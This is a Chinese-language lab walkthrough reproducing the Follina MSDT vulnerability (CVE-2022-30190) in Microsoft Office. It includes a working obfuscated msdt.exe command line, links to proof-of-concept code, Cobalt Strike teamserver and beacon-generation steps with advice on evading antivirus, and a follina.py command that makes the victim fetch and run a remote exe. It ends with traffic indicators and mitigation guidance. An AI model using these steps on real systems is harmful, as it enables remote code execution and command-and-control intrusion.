目录

0x01 声明：

0x02 简介：

0x03 漏洞概述：

0x04 影响版本：

0x05 环境搭建：

0x06 漏洞复现：

是否存在利用点：

CMD执行：

生成docx文件利用：

0x07 CS上线：

启动CS服务端：

CS客户端连接：

设置监听：

生成攻击exe：

宿主机启动8080服务：

利用POC

修改POC：

启动POC

文件放到Windows 10虚拟机

宿主机日志：

CS客户端上线:

0x08 流量分析：

MSDT流量：

0x09 修复建议：

0x01 声明：

        仅供学习参考使用，请勿用作违法用途，否则后果自负。

0x02 简介：

        Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。

0x03 漏洞概述：

        Microsoft Office 存在远程代码执行漏洞，攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件，通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。另外，该漏洞在宏被禁用的情况下，仍能通过 MSDT（Microsoft Support Diagnostics Tool）功能执行代码，当恶意文件保存为 RTF 格式时，甚至无需打开文件，通过资源管理器中的预览选项卡即可在目标机器上执行任意代码。

0x04 影响版本：

      Microsoft Office 2016、Microsoft Office 2021（其他版本有待确认）

0x05 环境搭建：

      Windows 10虚拟机（一定要把Windows Defender关闭）

参考这篇文章:

彻底关闭Windows Defender&Windows 更新_Evan Kang的博客-CSDN博客

      Windows 10 宿主机

      Kali 虚拟机

      POC1:

https://github.com/chvancooten/follina.py

https://download.csdn.net/download/qq_44281295/86727749?spm=1001.2014.3001.5501

      POC2:

https://github.com/JohnHammond/msdt-follina

https://download.csdn.net/download/qq_44281295/86727749?spm=1001.2014.3001.5501

0x06 漏洞复现：

是否存在利用点：

CMD执行：

​
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

生成docx文件利用：

0x07 CS上线：

启动CS服务端：

chmod +x teamserver

./teamserver ip key(key为密钥，客户端连接时候使用)

CS客户端连接：

设置监听：

点击“Cobalt Strike”–“Listeners”—“Add”—输入“ Name” —添加“HTTP Hosts”—点击“Save”

生成攻击exe：

点击“Attacks”—“Packages”—“Windows Executable”—点击“…”—选择“test”—点击“Generate”—选择一个路径存放exe（注意加白，会被杀。）

宿主机启动8080服务：

主要目的是让被害主机从这个服务上下载CS生成的exe。

python -m http.server 8080

利用POC

POC地址：xxx

修改POC：

启动POC

python follina.py -i 192.168.18.130 -p 8000 -r 6000

文件放到Windows 10虚拟机

(注意加白，会被杀软干掉。)

宿主机日志：

宿主机8080会收到一条下载成功的日志

CS客户端上线:

0x08 流量分析：

(请求CS生成exe应该在VPS上的，测试环境中在攻击者这边生成比较方便)

MSDT流量：

在流量分析中，发现只会有几种请求头：

User-Agent: Microsoft Office Protocol Discovery

User-Agent: Microsoft Office Word 2014

Mozilla/4.0 (compatible; ms-office; MSOffice 16)

伴随着的请求方式有:

HEAD                请求路径为 “/index.html”

OPTIONS          请求路径为 “/”

0x09 修复建议：

        目前可参考官方文档禁用 MSDT URL 协议或通过 Microsoft Defender 检测和保护系统。

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/